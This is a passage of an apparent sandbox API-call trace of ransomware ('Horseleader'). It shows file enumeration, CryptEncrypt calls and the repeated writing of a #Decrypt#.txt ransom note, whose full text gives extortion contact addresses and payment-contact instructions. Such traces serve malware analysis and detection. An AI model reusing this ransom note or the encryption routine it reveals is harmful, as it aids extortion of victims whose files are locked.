cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0234.191] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0234.191] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\tipresx.dll.mui") returned 76 [0234.191] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0234.191] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0234.191] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0234.191] lstrlenW (lpString=".testttjffg") returned 11 [0234.191] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0234.192] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0234.192] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0234.192] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ja-jp\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.192] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe68981a0, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe6aad4b6, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe6aad4b6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0234.192] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0234.192] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\#Decrypt#.txt") returned 74 [0234.192] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ja-jp\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0234.193] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0234.193] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0234.194] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0234.194] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0234.194] CloseHandle (hObject=0x158) returned 1 [0234.195] GetProcessHeap () returned 0x780000 [0234.195] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0234.195] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b45ecf9, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x8b45ecf9, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x2b0dd120, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x14de00, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="journal.dll", cAlternateFileName="")) returned 1 [0234.195] lstrcmpiW (lpString1="journal.dll", lpString2="Windows") returned -1 [0234.195] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\journal.dll") returned 66 [0234.195] StrStrIW (lpFirst="journal.dll", lpSrch=".horseleader") returned 0x0 [0234.195] lstrcmpW (lpString1="journal.dll", lpString2="#Decrypt#.txt") returned 1 [0234.195] lstrcmpW (lpString1="journal.dll", lpString2="_uninstalling_.png") returned 1 [0234.195] lstrlenW (lpString=".testttjffg") returned 11 [0234.195] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\journal.dll", lpSrch=".testttjffg") returned 0x0 [0234.195] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.195] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.196] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\journal.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\journal.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.196] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0234.196] lstrcmpiW (lpString1="ko-KR", lpString2="Windows") returned -1 [0234.196] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR") returned 60 [0234.196] lstrcmpW (lpString1="ko-KR", lpString2=".") returned 1 [0234.196] lstrcmpW (lpString1="ko-KR", lpString2="..") returned 1 [0234.196] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0234.196] GetProcessHeap () returned 0x780000 [0234.196] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0234.196] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\*") returned 62 [0234.197] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0234.197] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0234.197] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\.") returned 62 [0234.197] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0234.197] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0234.197] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0234.197] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\..") returned 63 [0234.198] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0234.198] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0234.198] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4e1cef6, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe507e4c6, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe507e4c6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0234.198] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0234.198] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\tipresx.dll.mui") returned 76 [0234.198] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0234.198] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0234.198] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0234.198] lstrlenW (lpString=".testttjffg") returned 11 [0234.199] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0234.199] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0234.199] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0234.199] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ko-kr\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.199] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4e1cef6, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe507e4c6, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe507e4c6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0234.199] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0234.199] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\#Decrypt#.txt") returned 74 [0234.200] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ko-kr\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0234.200] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0234.200] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0234.201] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0234.202] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0234.202] CloseHandle (hObject=0x158) returned 1 [0234.202] GetProcessHeap () returned 0x780000 [0234.202] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0234.202] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="lt-LT", cAlternateFileName="")) returned 1 [0234.202] lstrcmpiW (lpString1="lt-LT", lpString2="Windows") returned -1 [0234.202] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT") returned 60 [0234.202] lstrcmpW (lpString1="lt-LT", lpString2=".") returned 1 [0234.203] lstrcmpW (lpString1="lt-LT", lpString2="..") returned 1 [0234.203] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0234.203] GetProcessHeap () returned 0x780000 [0234.203] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0234.203] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\*") returned 62 [0234.203] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0234.205] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0234.205] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\.") returned 62 [0234.205] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0234.205] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0234.205] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0234.205] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\..") returned 63 [0234.205] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0234.205] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0234.205] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe608f802, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe627e9bb, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe62a4b18, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0234.206] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0234.206] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\tipresx.dll.mui") returned 76 [0234.206] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0234.206] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0234.206] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0234.206] lstrlenW (lpString=".testttjffg") returned 11 [0234.206] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0234.206] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0234.206] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0234.206] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lt-lt\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.207] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe608f802, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe627e9bb, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe62a4b18, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0234.207] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0234.207] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\#Decrypt#.txt") returned 74 [0234.207] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lt-lt\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 